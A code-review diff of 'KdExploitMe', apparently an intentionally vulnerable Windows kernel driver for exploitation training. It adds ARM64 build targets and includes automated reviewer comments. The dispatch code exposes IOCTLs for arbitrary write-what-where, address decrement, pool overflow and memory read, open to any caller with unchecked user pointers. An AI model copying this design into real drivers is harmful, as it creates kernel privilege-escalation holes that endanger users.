- PDEVICE_OBJECT deviceObject = NULL; // ptr to device object
-
- UNREFERENCED_PARAMETER(RegistryPath);
-
- RtlInitUnicodeString(&ntUnicodeString, NT_DEVICE_NAME);
-
- ntStatus = IoCreateDevice(
- DriverObject, // Our Driver Object
- 0, // We don't use a device extension
- &ntUnicodeString, // Device name "\Device\KdExploitMe"
- FILE_DEVICE_UNKNOWN, // Device type
- FILE_DEVICE_SECURE_OPEN, // Device characteristics
- FALSE, // Not an exclusive device
- &deviceObject); // Returned ptr to Device Object
-
- if (!NT_SUCCESS(ntStatus))
- {
- PrettyDbgPrint(("Couldn't create the device object\n"));
- return ntStatus;
- }
-
- //
- // Initialize the driver object with this driver's entry points.
- //
-
- DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreateClose;
- DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverCreateClose;
- DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDeviceControl;
- DriverObject->DriverUnload = DriverUnloadControl;
-
- //
- // Initialize a Unicode String containing the Win32 name
- // for our device.
- //
-
- RtlInitUnicodeString(&ntWin32NameString, DOS_DEVICE_NAME);
-
- //
- // Create a symbolic link between our device name and the Win32 name
- //
-
- ntStatus = IoCreateSymbolicLink(
- &ntWin32NameString, &ntUnicodeString);
-
- if (!NT_SUCCESS(ntStatus))
- {
- //
- // Delete everything that this routine has allocated.
- //
- PrettyDbgPrint(("Couldn't create symbolic link\n"));
- IoDeleteDevice(deviceObject);
- }
-
-
- return ntStatus;
-}
-
-
-NTSTATUS
-DriverCreateClose(
-PDEVICE_OBJECT DeviceObject,
-PIRP Irp
-)
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system when the KdExploitMe is opened or
-closed.
-
-No action is performed other than completing the request successfully.
-
-Arguments:
-
-DeviceObject - a pointer to the object that represents the device
-that I/O is to be done on.
-
-Irp - a pointer to the I/O Request Packet for this request.
-
-Return Value:
-
-NT status code
-
---*/
-
-{
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- Irp->IoStatus.Status = STATUS_SUCCESS;
- Irp->IoStatus.Information = 0;
-
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
-
- return STATUS_SUCCESS;
-}
-
-VOID
-DriverUnloadControl(
-_In_ PDRIVER_OBJECT DriverObject
-)
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system to unload the driver.
-
-Any resources previously allocated must be freed.
-
-Arguments:
-
-DriverObject - a pointer to the object that represents our driver.
-
-Return Value:
-
-None
---*/
-
-{
- PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;
- UNICODE_STRING uniWin32NameString;
-
- PAGED_CODE();
-
- //
- // Create counted string version of our Win32 device name.
- //
-
- RtlInitUnicodeString(&uniWin32NameString, DOS_DEVICE_NAME);
-
-
- //
- // Delete the link from our device name to a name in the Win32 namespace.
- //
-
- IoDeleteSymbolicLink(&uniWin32NameString);
-
- if (deviceObject != NULL)
- {
- IoDeleteDevice(deviceObject);
- }
-
-
-
-}
-
-NTSTATUS
-DriverDeviceControl(
-PDEVICE_OBJECT DeviceObject,
-PIRP Irp
-)
-
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system to perform a device I/O
-control function.
-
-Arguments:
-
-DeviceObject - a pointer to the object that represents the device
-that I/O is to be done on.
-
-Irp - a pointer to the I/O Request Packet for this request.
-
-Return Value:
-
-NT status code
-
---*/
-
-{
- PIO_STACK_LOCATION irpSp;// Pointer to current stack location
- NTSTATUS ntStatus = STATUS_SUCCESS;// Assume success
- ULONG inBufLength; // Input buffer length
- ULONG outBufLength; // Output buffer length
- PCHAR inBuf; // pointer to Input and output buffer
-// PCHAR data = "This String is from Device Driver !!!";
-// size_t datalen = strlen(data) + 1;//Length of data including null
-// PMDL mdl = NULL;
-// PCHAR buffer = NULL;
-
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- irpSp = IoGetCurrentIrpStackLocation(Irp);
- inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
- outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
-
- if (!inBufLength || !outBufLength)
- {
- ntStatus = STATUS_INVALID_PARAMETER;
- goto End;
- }
-
- //
- // Determine which I/O control code was specified.
- //
-
- switch (irpSp->Parameters.DeviceIoControl.IoControlCode)
- {
- case IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
-
- ntStatus = WriteWhatWhere(DeviceObject, Irp, (PDATACOPY)inBuf);
-
- break;
- case IOCTL_KDEXPLOITME_METHOD_DECADDRESS:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
-
- ntStatus = DecAddress(DeviceObject, Irp, (PDECADDRESS)inBuf);
- break;
- case IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL:
- inBuf = Irp->AssociatedIrp.SystemBuffer;
- ntStatus = OverflowPool(DeviceObject, Irp, (POVERFLOW_PAGEDPOOL)inBuf);
- break;
- case IOCTL_KDEXPLOITME_METHOD_READMEM:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
- ntStatus = Leak(DeviceObject, Irp, inBuf, irpSp->Parameters.DeviceIoControl.InputBufferLength, Irp->UserBuffer, irpSp->Parameters.DeviceIoControl.OutputBufferLength);
- break;
- default:
-
- //
- // The specified I/O control code is unrecognized by this driver.
- //
-
- ntStatus = STATUS_INVALID_DEVICE_REQUEST;
- PrettyDbgPrint(("ERROR: unrecognized IOCTL %x\n",
- irpSp->Parameters.DeviceIoControl.IoControlCode));
- break;
- }
-
-End:
- //
- // Finish the I/O operation by simply completing the packet and returning
- // the same status as in the packet itself.
- //
-
- Irp->IoStatus.Status = ntStatus;
-
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
-
- return ntStatus;
-}
-
-VOID
-PrintIrpInfo(
-PIRP Irp)
-{
- PIO_STACK_LOCATION irpSp;
- irpSp = IoGetCurrentIrpStackLocation(Irp);
-
- PAGED_CODE();
-
- PrettyDbgPrint(("\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n",
- Irp->AssociatedIrp.SystemBuffer));
- PrettyDbgPrint(("\tIrp->UserBuffer = 0x%p\n", Irp->UserBuffer));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n",
- irpSp->Parameters.DeviceIoControl.Type3InputBuffer));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n",
- irpSp->Parameters.DeviceIoControl.InputBufferLength));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n",
- irpSp->Parameters.DeviceIoControl.OutputBufferLength));
- return;
-}
-
-VOID
-PrintChars(
-_In_reads_(CountChars) PCHAR BufferAddress,
-_In_ size_t CountChars
-)
-{
- PAGED_CODE();
-
- if (CountChars) {
-
- while (CountChars--) {
-
- if (*BufferAddress > 31
- && *BufferAddress != 127) {
-
- KdPrint(("%c", *BufferAddress));
-
- }
- else {
-
- KdPrint(("."));
-
- }
- BufferAddress++;
- }
- KdPrint(("\n"));
- }
- return;
-}
-
-
+//
+// Include files.
+//
+
+#include // various NT definitions
+#include
+
+#include "KdExploitMe.h"
+#include "HandleIOCTL.h"
+#include "Structures.h"
+
+#define NT_DEVICE_NAME L"\\Device\\KdExploitMe"
+#define DOS_DEVICE_NAME L"\\DosDevices\\KdExploitMe"
+
+#if DBG
+#define PrettyDbgPrint(_x_) \
+ DbgPrint("KdExploitMe.SYS: "); \
+ DbgPrint _x_;
+
+#else
+#define PrettyDbgPrint(_x_)
+#endif
+
+//
+// Device driver routine declarations.
+//
+
+DRIVER_INITIALIZE DriverEntry;
+
+_Dispatch_type_(IRP_MJ_CREATE)
+_Dispatch_type_(IRP_MJ_CLOSE)
+DRIVER_DISPATCH DriverCreateClose;
+
+_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
+DRIVER_DISPATCH DriverDeviceControl;
+
+DRIVER_UNLOAD DriverUnloadControl;
+
+VOID
+PrintIrpInfo(
+PIRP Irp
+);
+VOID
+PrintChars(
+_In_reads_(CountChars) PCHAR BufferAddress,
+_In_ size_t CountChars
+);
+
+
+
+NTSTATUS
+DriverEntry(
+_In_ PDRIVER_OBJECT DriverObject,
+_In_ PUNICODE_STRING RegistryPath
+)
+/*++
+
+Routine Description:
+This routine is called by the Operating System to initialize the driver.
+
+It creates the device object, fills in the dispatch entry points and
+completes the initialization.
+
+Arguments:
+DriverObject - a pointer to the object that represents this device
+driver.
+
+RegistryPath - a pointer to our Services key in the registry.
+
+Return Value:
+STATUS_SUCCESS if initialized; an error otherwise.
+
+--*/
+
+{
+ NTSTATUS ntStatus;
+ UNICODE_STRING ntUnicodeString; // NT Device Name "\Device\WDMDriver"
+ UNICODE_STRING ntWin32NameString; // Win32 Name "\DosDevices\IoctlTest"
+ PDEVICE_OBJECT deviceObject = NULL; // ptr to device object
+
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+ RtlInitUnicodeString(&ntUnicodeString, NT_DEVICE_NAME);
+
+ ntStatus = IoCreateDevice(
+ DriverObject, // Our Driver Object
+ 0, // We don't use a device extension
+ &ntUnicodeString, // Device name "\Device\KdExploitMe"
+ FILE_DEVICE_UNKNOWN, // Device type
+ FILE_DEVICE_SECURE_OPEN, // Device characteristics
+ FALSE, // Not an exclusive device
+ &deviceObject); // Returned ptr to Device Object
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ PrettyDbgPrint(("Couldn't create the device object\n"));
+ return ntStatus;
+ }
+
+ //
+ // Initialize the driver object with this driver's entry points.
+ //
+
+ DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreateClose;
+ DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverCreateClose;
+ DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDeviceControl;
+ DriverObject->DriverUnload = DriverUnloadControl;
+
+ //
+ // Initialize a Unicode String containing the Win32 name
+ // for our device.
+ //
+
+ RtlInitUnicodeString(&ntWin32NameString, DOS_DEVICE_NAME);
+
+ //
+ // Create a symbolic link between our device name and the Win32 name
+ //
+
+ ntStatus = IoCreateSymbolicLink(
+ &ntWin32NameString, &ntUnicodeString);
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ //
+ // Delete everything that this routine has allocated.
+ //
+ PrettyDbgPrint(("Couldn't create symbolic link\n"));
+ IoDeleteDevice(deviceObject);
+ }
+
+
+ return ntStatus;
+}
+
+
+NTSTATUS
+DriverCreateClose(
+PDEVICE_OBJECT DeviceObject,
+PIRP Irp
+)
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system when the KdExploitMe is opened or
+closed.
+
+No action is performed other than completing the request successfully.
+
+Arguments:
+
+DeviceObject - a pointer to the object that represents the device
+that I/O is to be done on.
+
+Irp - a pointer to the I/O Request Packet for this request.
+
+Return Value:
+
+NT status code
+
+--*/
+
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+ PAGED_CODE();
+
+ Irp->IoStatus.Status = STATUS_SUCCESS;
+ Irp->IoStatus.Information = 0;
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+
+ return STATUS_SUCCESS;
+}
+
+VOID
+DriverUnloadControl(
+_In_ PDRIVER_OBJECT DriverObject
+)
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system to unload the driver.
+
+Any resources previously allocated must be freed.
+
+Arguments:
+
+DriverObject - a pointer to the object that represents our driver.
+
+Return Value:
+
+None
+--*/
+
+{
+ PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;
+ UNICODE_STRING uniWin32NameString;
+
+ PAGED_CODE();
+
+ //
+ // Create counted string version of our Win32 device name.
+ //
+
+ RtlInitUnicodeString(&uniWin32NameString, DOS_DEVICE_NAME);
+
+
+ //
+ // Delete the link from our device name to a name in the Win32 namespace.
+ //
+
+ IoDeleteSymbolicLink(&uniWin32NameString);
+
+ if (deviceObject != NULL)
+ {
+ IoDeleteDevice(deviceObject);
+ }
+
+
+
+}
+
+NTSTATUS
+DriverDeviceControl(
+PDEVICE_OBJECT DeviceObject,
+PIRP Irp
+)
+
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system to perform a device I/O
+control function.
+
+Arguments:
+
+DeviceObject - a pointer to the object that represents the device
+that I/O is to be done on.
+
+Irp - a pointer to the I/O Request Packet for this request.
+
+Return Value:
+
+NT status code
+
+--*/
+
+{
+ PIO_STACK_LOCATION irpSp;// Pointer to current stack location
+ NTSTATUS ntStatus = STATUS_SUCCESS;// Assume success
+ ULONG inBufLength; // Input buffer length
+ ULONG outBufLength; // Output buffer length
+ PCHAR inBuf; // pointer to Input and output buffer
+// PCHAR data = "This String is from Device Driver !!!";
+// size_t datalen = strlen(data) + 1;//Length of data including null
+// PMDL mdl = NULL;
+// PCHAR buffer = NULL;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+ PAGED_CODE();
+
+ irpSp = IoGetCurrentIrpStackLocation(Irp);
+ inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
+ outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
+
+ if (!inBufLength || !outBufLength)
+ {
+ ntStatus = STATUS_INVALID_PARAMETER;
+ goto End;
+ }
+
+ //
+ // Determine which I/O control code was specified.
+ //
+
+ switch (irpSp->Parameters.DeviceIoControl.IoControlCode)
+ {
+ case IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+
+ ntStatus = WriteWhatWhere(DeviceObject, Irp, (PDATACOPY)inBuf);
+
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_DECADDRESS:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+
+ ntStatus = DecAddress(DeviceObject, Irp, (PDECADDRESS)inBuf);
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL:
+ inBuf = (PCHAR)Irp->AssociatedIrp.SystemBuffer;
+ ntStatus = OverflowPool(DeviceObject, Irp, (POVERFLOW_PAGEDPOOL)inBuf);
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_READMEM:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+ ntStatus = Leak(DeviceObject, Irp, inBuf, irpSp->Parameters.DeviceIoControl.InputBufferLength, Irp->UserBuffer, irpSp->Parameters.DeviceIoControl.OutputBufferLength);
+ break;
+ default:
+
+ //
+ // The specified I/O control code is unrecognized by this driver.
+ //
+
+ ntStatus = STATUS_INVALID_DEVICE_REQUEST;
+ PrettyDbgPrint(("ERROR: unrecognized IOCTL %x\n",
+ irpSp->Parameters.DeviceIoControl.IoControlCode));
+ break;
+ }
+
+End:
+ //
+ // Finish the I/O operation by simply completing the packet and returning
+ // the same status as in the packet itself.
+ //
+
+ Irp->IoStatus.Status = ntStatus;
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+
+ return ntStatus;
+}
+
+VOID
+PrintIrpInfo(
+PIRP Irp)
+{
+ PIO_STACK_LOCATION irpSp;
+ irpSp = IoGetCurrentIrpStackLocation(Irp);
+
+ PAGED_CODE();
+
+ PrettyDbgPrint(("\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n",
+ Irp->AssociatedIrp.SystemBuffer));
+ PrettyDbgPrint(("\tIrp->UserBuffer = 0x%p\n", Irp->UserBuffer));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n",
+ irpSp->Parameters.DeviceIoControl.Type3InputBuffer));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n",
+ irpSp->Parameters.DeviceIoControl.InputBufferLength));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n",
+ irpSp->Parameters.DeviceIoControl.OutputBufferLength));
+ return;
+}
+
+VOID
+PrintChars(
+_In_reads_(CountChars) PCHAR BufferAddress,
+_In_ size_t CountChars
+)
+{
+ PAGED_CODE();
+
+ if (CountChars) {
+
+ while (CountChars--) {
+
+ if (*BufferAddress > 31
+ && *BufferAddress != 127) {
+
+ KdPrint(("%c", *BufferAddress));
+
+ }
+ else {
+
+ KdPrint(("."));
+
+ }
+ BufferAddress++;
+ }
+ KdPrint(("\n"));
+ }
+ return;
+}
+
+
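Review bot: The `#ifdef ALLOC_PRAGMA` / `#pragma alloc_text(PAGE, …)` block is dropped from the new file while DriverCreateClose, DriverUnloadControl, DriverDeviceControl, PrintIrpInfo and PrintChars still open with `PAGED_CODE();`, so these routines now sit in the default non-paged section yet keep an assertion whose purpose is to guard pageable code. That is harmless at runtime (the macro only asserts IRQL <= APC_LEVEL), but the reason for the removal is not visible here, presumably an ARM64 toolset constraint; a comment above the declarations such as `// alloc_text removed: all routines are non-paged on every target; PAGED_CODE() kept as an IRQL assertion only` would stop the next reader from re-adding the pragmas or misreading the macros. PrintIrpInfo and PrintChars are declared and defined but never called from this translation unit, so they are dead code unless referenced elsewhere. The local comment `// pointer to Input and output buffer` on `inBuf` is also stale: in every case it now carries only the input pointer, and READMEM takes its output pointer straight from `Irp->UserBuffer`.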
diff --git a/KdExploitMe/KdExploitMe.h b/KdExploitMe/KdExploitMe.h
index b9b7687..d457f9e 100644
--- a/KdExploitMe/KdExploitMe.h
+++ b/KdExploitMe/KdExploitMe.h
@@ -1,25 +1,25 @@
-//
-// Device type -- in the "User Defined" range."
-//
-#define KDEXPLOITME_TYPE 40000
-//
-// The IOCTL function codes from 0x800 to 0xFFF are for customer use.
-//
-#define IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE \
- CTL_CODE(KDEXPLOITME_TYPE, 0x900, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_DECADDRESS \
- CTL_CODE(KDEXPLOITME_TYPE, 0x901, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL \
- CTL_CODE(KDEXPLOITME_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_READMEM \
- CTL_CODE(KDEXPLOITME_TYPE, 0x903, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-
-#define DRIVER_FUNC_INSTALL 0x01
-#define DRIVER_FUNC_REMOVE 0x02
-
-#define DRIVER_NAME "KdExploitMe"
-
+//
+// Device type -- in the "User Defined" range."
+//
+#define KDEXPLOITME_TYPE 40000
+//
+// The IOCTL function codes from 0x800 to 0xFFF are for customer use.
+//
+#define IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x900, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_DECADDRESS \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x901, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_READMEM \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x903, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+
+#define DRIVER_FUNC_INSTALL 0x01
+#define DRIVER_FUNC_REMOVE 0x02
+
+#define DRIVER_NAME "KdExploitMe"
+
diff --git a/KdExploitMe/KdExploitMe.inf b/KdExploitMe/KdExploitMe.inf
index 6369283..230843c 100644
--- a/KdExploitMe/KdExploitMe.inf
+++ b/KdExploitMe/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NT$ARCH$
-
-[Standard.NT$ARCH$]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NT$ARCH$
+
+[Standard.NT$ARCH$]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/KdExploitMe.vcxproj b/KdExploitMe/KdExploitMe.vcxproj
index 6cefcf7..af96809 100644
--- a/KdExploitMe/KdExploitMe.vcxproj
+++ b/KdExploitMe/KdExploitMe.vcxproj
@@ -1,230 +1,289 @@
-
-
-
-
- Win8.1 Debug
- Win32
-
-
- Win8.1 Release
- Win32
-
-
- Win8 Debug
- Win32
-
-
- Win8 Release
- Win32
-
-
- Win7 Debug
- Win32
-
-
- Win7 Release
- Win32
-
-
- Win8.1 Debug
- x64
-
-
- Win8.1 Release
- x64
-
-
- Win8 Debug
- x64
-
-
- Win8 Release
- x64
-
-
- Win7 Debug
- x64
-
-
- Win7 Release
- x64
-
-
-
- {A239482B-8B6C-448F-969B-563E3B8DE701}
- {dd38f7fc-d7bd-488b-9242-7d8754cde80d}
- v4.5
- 11.0
- Win8.1 Debug
- Win32
- KdExploitMe
-
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
-
-
-
-
-
-
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+ Win7 Debug
+ ARM64
+
+
+ Win7 Release
+ ARM64
+
+
+ Win8 Debug
+ ARM64
+
+
+ Win8 Release
+ ARM64
+
+
+ Win8.1 Debug
+ ARM64
+
+
+ Win8.1 Debug
+ Win32
+
+
+ Win8.1 Release
+ ARM64
+
+
+ Win8.1 Release
+ Win32
+
+
+ Win8 Debug
+ Win32
+
+
+ Win8 Release
+ Win32
+
+
+ Win7 Debug
+ Win32
+
+
+ Win7 Release
+ Win32
+
+
+ Win8.1 Debug
+ x64
+
+
+ Win8.1 Release
+ x64
+
+
+ Win8 Debug
+ x64
+
+
+ Win8 Release
+ x64
+
+
+ Win7 Debug
+ x64
+
+
+ Win7 Release
+ x64
+
+
+
+ {A239482B-8B6C-448F-969B-563E3B8DE701}
+ {dd38f7fc-d7bd-488b-9242-7d8754cde80d}
+ v4.5
+ 11.0
+ Win8.1 Debug
+ Win32
+ KdExploitMe
+ 10.0.26100.0
+
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ WindowsKernelModeDriver10.0
+
+
+
+
+
+
+
+
+
+ C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.26100.0\km\arm64;$(ExternalIncludePath)
+ C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.26100.0\km\arm64;$(IncludePath)
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.26100.0\km;%(AdditionalIncludeDirectories)
+ _ARM64_;%(PreprocessorDefinitions)
+
+
+ DriverEntry
+ Console
+ ntoskrnl.lib;
+hal.lib;
+wdmsec.lib;%(AdditionalDependencies)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
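Review bot: The new ARM64 configuration hard-codes absolute SDK locations (`C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.26100.0\km\arm64` in what appear to be the include-path properties, and `C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.26100.0\km` in AdditionalIncludeDirectories), so the driver only builds on a machine with that exact SDK installed at that exact path; the element names are stripped in this rendering, so which properties these are is inferred. Expressing them through `$(WindowsSdkDir)` and `$(WindowsTargetPlatformVersion)`, which the Globals group already appears to set to `10.0.26100.0`, keeps the build portable across machines and SDK updates. The first pair also points at a `Lib\` directory while sitting in include-path properties, which looks like a copy-paste slip, and `_ARM64_` is normally supplied by the WDK platform targets rather than hand-added to PreprocessorDefinitions. If these overrides are deliberate workarounds, a short XML comment at the top of that property group saying so would save the next maintainer from "fixing" them.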
diff --git a/KdExploitMe/KdExploitMe.vcxproj.filters b/KdExploitMe/KdExploitMe.vcxproj.filters
index 1e9bbb1..4c38922 100644
--- a/KdExploitMe/KdExploitMe.vcxproj.filters
+++ b/KdExploitMe/KdExploitMe.vcxproj.filters
@@ -1,45 +1,45 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
- {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
- rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
-
-
- {8E41214B-6785-4CFE-B992-037D68949A14}
- inf;inv;inx;mof;mc;
-
-
-
-
- Driver Files
-
-
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+ {8E41214B-6785-4CFE-B992-037D68949A14}
+ inf;inv;inx;mof;mc;
+
+
+
+
+ Driver Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files
+
+
\ No newline at end of file
diff --git a/KdExploitMe/KdExploitMe.vcxproj.user b/KdExploitMe/KdExploitMe.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/KdExploitMe/KdExploitMe.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
